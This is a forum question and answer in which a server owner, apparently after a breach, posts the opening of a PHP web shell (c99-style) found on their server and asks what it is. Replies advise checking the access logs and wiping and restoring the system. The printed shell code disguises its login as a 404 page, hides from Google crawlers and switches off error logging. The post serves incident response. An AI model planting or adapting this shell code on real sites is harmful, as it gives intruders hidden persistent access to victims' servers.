-1

Someone has gained complete access to my server by uploading a php file and running a shell from the file. I searched and found out it could be a c99madshell script.

The code snippets of the file look like:

$auth_pass = "f727df897cbcceea7022d3c8ec66ae29";  
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', 'Ver 2.0');
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
function printLogin() {
    echo '<title>404 Not Found</title>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
          <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
          <form method=post><input type=password name=pass></form>';
    exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();

if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';

Below is the link of the complete file. https://1fichier.com/?usbv9z1ss3

Can anyone please help me to figure out what type of attack is it, what threats it possess and its remedies? I think this is a particular type of attack already faced by many. I would appreciate much if anyone could point me in the direction to fix this particular case. Thanks

  • You server has been hacked. The list of possible vulnerabilities is way too big to write. – ThoriumBR Dec 06 '16 at 11:31
  • @Matthew that deals with a more general concept – user3929745 Dec 06 '16 at 11:44
  • 2
    @user3929745 The advice is the same for all types of attack - once they've got software onto your box, you need to consider it all compromised. You have no way to be sure that they've not left other payloads in place which will allow them to regain access later. The answer I linked is the canonical answer to all compromised server questions for a reason. – Matthew Dec 06 '16 at 11:45

1 Answers1

2

Looks like this file was uploaded to your server, presumably through a website the server is hosting. You can check your webservers' access logs if you want to be sure.

The script itself is used for executing commands remotely, and also retrieving general information about your system. ALL the information: installed software, users, groups, current uid, disk space, you name it. It looks like once you are authenticated, you also have access some sort of a control panel.

As for remedies; once they have access to your system it would be wise to just wipe it and restore a backup.

Zwans
  • 74
  • 2